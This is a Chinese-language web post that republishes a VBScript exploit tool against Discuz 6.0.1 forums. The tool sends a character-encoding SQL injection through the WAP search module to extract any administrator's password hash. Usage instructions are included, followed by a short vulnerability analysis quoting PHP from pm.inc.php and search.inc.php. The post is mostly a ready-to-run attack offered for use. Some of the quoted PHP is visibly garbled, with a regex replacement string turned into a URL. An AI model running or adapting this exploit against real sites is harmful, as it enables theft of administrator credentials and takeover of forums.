discuz获取任意管理员密码漏洞利用工具vbs版

本打算考虑写个python版的，考虑大家的机器环境还是弄了个vbs版也利于修改以下是search.inc.php 文件漏洞利用代码VBS版

Dim strUrl,strSite,strPath,strUid
showB()
Set Args = Wscript.Arguments
If Args.Count <> 3 Then
ShowU()
Else
strSite=Args(0)
strPath=Args(1)
strUid=Args(2)
End If
strUrl="action=search&searchid=22%cf' UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" & strUid &"/*&do=submit"
Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.Open "POST",strSite & strPath & "index.php", False
objXML.SetRequestHeader "Accept", "*/*"
objXML.SetRequestHeader "Accept-Language", "zh-cn"
objXML.SetRequestHeader "Content-Type", "application/x- -form-urlencoded"
objXML.SetRequestHeader "User-Agent", "wap"
objXML.send(strUrl)
wscript.echo(objXML.ResponseText)
Sub showB()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("Exploit discuz6.0.1")
.Echo("Code By Safe3")
.Echo("+--------------------------=====================------------------------------+")
End with
End Sub
Sub showU()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("用法:")
.Echo(" cscript "&.ScriptName&" site path uid")
.Echo("例子:")
.Echo(" cscript "&.ScriptName&" http:// .example.com/ /forum/ 1 >result.txt")
.Echo("+--------------------------=====================------------------------------+")
.Quit
End with
End Sub

获得的密码大家自己在result.txt中查找
以下漏洞分析来自冰封浪子
漏洞说明：Discuz 论坛系统 是一套采用php+mysql数据库方式运行,在其中发现了一个安全漏洞，成功利用此漏洞可以提取管理员的密码进入后台，取得管理员权限。
漏洞解析：在Discuz的wap模块中的字符转码程序存在问题，在discuz的wap模块中，该编码转换类存在严重的问题。在Discuz中，wap是默认开启的，很容易被攻击者利用，这个问题存在与discuz所有版本中。
在discuz代码中存在多处可利用的地方，如:pm.inc.php/search.inc.php等，下面给出可疑代码片段：
pm.inc.php：

$floodctrl = $floodctrl * 2;
if($floodctrl && !$disablepostctrl && $timestamp - $lastpost < $floodctrl) {
wapmsg(’pm_flood_ctrl’);
}
if($formhash != formhash()) {
wapmsg(’wap_submit_invalid’);
}
$member = $db->fetch_first(”SELECT m.uid AS msgtoid, mf.ignorepm FROM {$tablepre}members m
LEFT JOIN {$tablepre}memberfields mf USING (uid)
WHERE username=’$msgto’”);
if(!$member) {
wapmsg(’pm_send_nonexistence’);
}
if(preg_match(”/(^{ALL}$|(,|^)\s*”.preg_quote($discuz_user, ‘/’).”\s*(,|$))/i”, $member['ignorepm'])) {
wapmsg(’pm_send_ignore’);
}
if(empty($subject) || empty($message)) {
wapmsg(’pm_sm_isnull’);
}
search.inc.php:
if(isset($searchid)) {
$page = max(1, intval($page));
$start_limit = $number = ($page - 1) * $waptpp;
$index = $db->fetch_first(”SELECT searchstring, keywords, threads, tids FROM {$tablepre}searchindex WHERE searchid=’$searchid’”);
if(!$index) {
wapmsg(’search_id_invalid1′);
}
$index['keywords'] = rawurlencode($index['keywords']);
$index['searchtype'] = preg_replace(”/^([a-z]+)\|.*/”, “http:// .cnblogs.com/Safe3/admin/file://0.0.0.1/“, $index['searchstring']);
$searchnum = $db->result_first(”SELECT COUNT(*) FROM {$tablepre}threads WHERE tid IN ($index[tids]) AND displayorder>=’0′”);
if($searchnum) {
echo “<p>$lang[search_result]<br />”;
$query = $db->query(”SELECT * FROM {$tablepre}threads WHERE tid IN ($index[tids]) AND displayorder>=’0′ ORDER BY dateline DESC LIMIT $start_limit, $waptpp”);
while($thread = $db->fetch_array($query)) {
echo “<a href=\”index.php?action=thread&tid=$thread[tid]\”>#”.++$number.” “.cutstr($thread['subject'], 24).”</a>($thread[views]/$thread[replies])<br />\n”;
}
echo wapmulti($searchnum, $waptpp, $page, “index.php?action=search&searchid=$searchid&do=submit&sid=$sid”);
echo ‘</p>’;
} else {
wapmsg(’search_invalid’);
}

疯狂暗示打赏按钮

本文标签：

声明：本文由代码号注册/游客用户【孤岚】供稿发布，本站不对用户发布的discuz获取任意管理员密码漏洞利用工具vbs版信息内容原创度和真实性等负责。如内容侵犯您的版权或其他权益，请留言并加以说明。站长审查之后若情况属实会及时为您删除。同时遵循 CC 4.0 BY-SA 版权协议，尊重和保护作者的劳动成果，转载请标明出处链接和本声明内容。本文作者：孤岚» https://www.ebingou.cn/dmh/16303.html

很赞哦！ ()